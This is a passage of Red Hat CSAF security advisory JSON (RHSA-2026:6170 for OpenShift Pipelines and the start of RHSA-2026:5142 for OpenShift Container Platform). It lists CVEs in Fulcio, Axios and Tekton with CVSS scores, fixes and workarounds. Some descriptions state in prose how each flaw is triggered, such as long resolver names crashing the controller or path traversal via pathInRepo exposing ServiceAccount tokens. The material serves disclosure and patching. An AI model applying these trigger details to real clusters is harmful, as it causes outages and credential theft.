"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6170",
"url": "https://access.redhat.com/errata/RHSA-2026:6170"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-66506",
"url": "https://access.redhat.com/security/cve/CVE-2025-66506"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33022",
"url": "https://access.redhat.com/security/cve/CVE-2026-33022"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33211",
"url": "https://access.redhat.com/security/cve/CVE-2026-33211"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6170.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Pipelines Release 1.21.1",
"tracking": {
"current_release_date": "2026-04-16T11:09:07+00:00",
"generator": {
"date": "2026-04-16T11:09:07+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6170",
"initial_release_date": "2026-03-30T12:14:24+00:00",
"revision_history": [
{
"date": "2026-03-30T12:14:24+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-30T12:15:19+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:07+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Pipelines 1.21",
"product": {
"name": "Red Hat OpenShift Pipelines 1.21",
"product_id": "Red Hat OpenShift Pipelines 1.21",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_pipelines:1.21::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Pipelines"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-operator-bundle@sha256%3A6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=1774871390"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64 as a component of Red Hat OpenShift Pipelines 1.21",
"product_id": "Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.21"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-66506",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2025-12-04T23:01:20.507333+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2419056"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Fulcio, a free-to-use certificate authority. This vulnerability allows a denial of service (DoS) due to excessive memory allocation when processing a malicious OpenID Connect (OIDC) identity token containing numerous period characters.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/sigstore/fulcio: Fulcio: Denial of Service via crafted OpenID Connect (OIDC) token",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Important for Red Hat as Fulcio, a certificate authority used for issuing code signing certificates, is susceptible to a denial of service when processing a specially crafted OpenID Connect (OIDC) token. This could lead to resource exhaustion and service unavailability in affected Red Hat products that utilize Fulcio.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-66506"
},
{
"category": "external",
"summary": "RHBZ#2419056",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419056"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-66506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66506"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-66506",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66506"
},
{
"category": "external",
"summary": "https://github.com/sigstore/fulcio/commit/765a0e57608b9ef390e1eeeea8595b9054c63a5a",
"url": "https://github.com/sigstore/fulcio/commit/765a0e57608b9ef390e1eeeea8595b9054c63a5a"
},
{
"category": "external",
"summary": "https://github.com/sigstore/fulcio/security/advisories/GHSA-f83f-xpx7-ffpw",
"url": "https://github.com/sigstore/fulcio/security/advisories/GHSA-f83f-xpx7-ffpw"
}
],
"release_date": "2025-12-04T22:04:41.637000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:14:24+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6170"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/sigstore/fulcio: Fulcio: Denial of Service via crafted OpenID Connect (OIDC) token"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:14:24+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6170"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-33022",
"cwe": {
"id": "CWE-130",
"name": "Improper Handling of Length Parameter Inconsistency"
},
"discovery_date": "2026-03-20T08:01:37.605922+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449483"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw was found in Tekton Pipelines. Any user who can create a TaskRun or PipelineRun to crash the controller cluster-wide by setting .spec.taskRef.resolver (or .spec.pipelineRef.resolver) to a string of 31+ characters. The crash occurs because GenerateDeterministicNameFromSpec produces a name exceeding the 63-character DNS-1123 label limit, and its truncation logic panics on a [-1] slice bound since the generated name contains no spaces. Once crashed, the controller enters a CrashLoopBackOff on restart (as it re-reconciles the offending resource), blocking all CI/CD reconciliation until the resource is manually deleted. Built-in resolvers (git, cluster, bundles, hub) are unaffected due to their short names, but any custom resolver name triggers the bug. The fix truncates the resolver-name prefix instead of the full string, preserving the hash suffix for determinism and uniqueness.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/tektoncd/pipeline: Tekton Pipelines: Denial of Service via long resolver names",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33022"
},
{
"category": "external",
"summary": "RHBZ#2449483",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449483"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33022",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33022"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33022",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33022"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/5eead3f859b9f938e86039e4d29185092c1d4ee6",
"url": "https://github.com/tektoncd/pipeline/commit/5eead3f859b9f938e86039e4d29185092c1d4ee6"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-cv4x-93xx-wgfj",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-cv4x-93xx-wgfj"
}
],
"release_date": "2026-03-20T07:48:15.383000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:14:24+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6170"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/tektoncd/pipeline: Tekton Pipelines: Denial of Service via long resolver names"
},
{
"cve": "CVE-2026-33211",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-03-24T00:02:20.093480+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450554"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Tekton Pipelines, specifically in the Tekton Pipelines git resolver. A tenant with permissions to create ResolutionRequests can exploit a path traversal vulnerability via the `pathInRepo` parameter. This allows the tenant to read arbitrary files from the resolver pod\u0027s filesystem, leading to information disclosure, including sensitive ServiceAccount tokens. The contents of these files are returned in a base64-encoded format.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Tekton Pipelines: github.com/tektoncd/pipeline: Tekton Pipelines: Information disclosure via path traversal in git resolver",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33211"
},
{
"category": "external",
"summary": "RHBZ#2450554",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450554"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33211",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33211"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33211",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33211"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/10fa538f9a2b6d01c75138f1ed7ba3da0e34687c",
"url": "https://github.com/tektoncd/pipeline/commit/10fa538f9a2b6d01c75138f1ed7ba3da0e34687c"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/318006c4e3a5",
"url": "https://github.com/tektoncd/pipeline/commit/318006c4e3a5"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/3ca7bc6e6dd1d97f80b84f78370d91edaf023cbd",
"url": "https://github.com/tektoncd/pipeline/commit/3ca7bc6e6dd1d97f80b84f78370d91edaf023cbd"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/961388fcf3374bc7656d28ab58ca84987e0a75ae",
"url": "https://github.com/tektoncd/pipeline/commit/961388fcf3374bc7656d28ab58ca84987e0a75ae"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/b1fee65b88aa969069c14c120045e97c37d9ee5e",
"url": "https://github.com/tektoncd/pipeline/commit/b1fee65b88aa969069c14c120045e97c37d9ee5e"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/cdb4e1e97a4f3170f9bc2cbfff83a6c8107bc3db",
"url": "https://github.com/tektoncd/pipeline/commit/cdb4e1e97a4f3170f9bc2cbfff83a6c8107bc3db"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/ec7755031a183b345cf9e64bea0e0505c1b9cb78",
"url": "https://github.com/tektoncd/pipeline/commit/ec7755031a183b345cf9e64bea0e0505c1b9cb78"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-j5q5-j9gm-2w5c",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-j5q5-j9gm-2w5c"
}
],
"release_date": "2026-03-23T23:55:54.089000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:14:24+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6170"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, restrict the creation of ResolutionRequests to trusted users and service accounts. Implement strict Role-Based Access Control (RBAC) policies to limit which tenants can create TaskRuns or PipelineRuns that utilize the Tekton Pipelines git resolver. This reduces the exposure by preventing unauthorized access to the resolver pod\u0027s filesystem.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.21:registry.redhat.io/openshift-pipelines/pipelines-operator-bundle@sha256:6585794d76cffb3f87fc7eacb905f0dd5f02476f717c911f2c0faf7c4081a080_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Tekton Pipelines: github.com/tektoncd/pipeline: Tekton Pipelines: Information disclosure via path traversal in git resolver"
}
]
}
RHSA-2026:5142
Vulnerability from csaf_redhat - Published: 2026-03-25 17:02 - Updated: 2026-04-16 10:29A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
| URL | Category | ||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Container Platform release 4.20.17 is now available with updates to packages and images that fix several bugs and add enhancements.\n\n This release includes a security update for Red Hat OpenShift Container Platform 4.20.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nThis advisory contains the container images for Red Hat OpenShift Container Platform 4.20.17. See the following advisory for the RPM packages for this release:\n\nhttps://access.redhat.com/errata/RHBA-2026:5140\n\nSpace precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.20/html/release_notes/",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5142",
"url": "https://access.redhat.com/errata/RHSA-2026:5142"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5142.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Container Platform 4.20.17 bug fix and security update",
"tracking": {
"current_release_date": "2026-04-16T10:29:28+00:00",
"generator": {
"date": "2026-04-16T10:29:28+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:5142",
"initial_release_date": "2026-03-25T17:02:30+00:00",
"revision_history": [
{
"date": "2026-03-25T17:02:30+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-25T17:02:56+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:29:28+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.2",
"product": {
"name": "Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.20::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Container Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772768149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-rhel9@sha256%3A4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772749146"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773133505"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb_amd64",
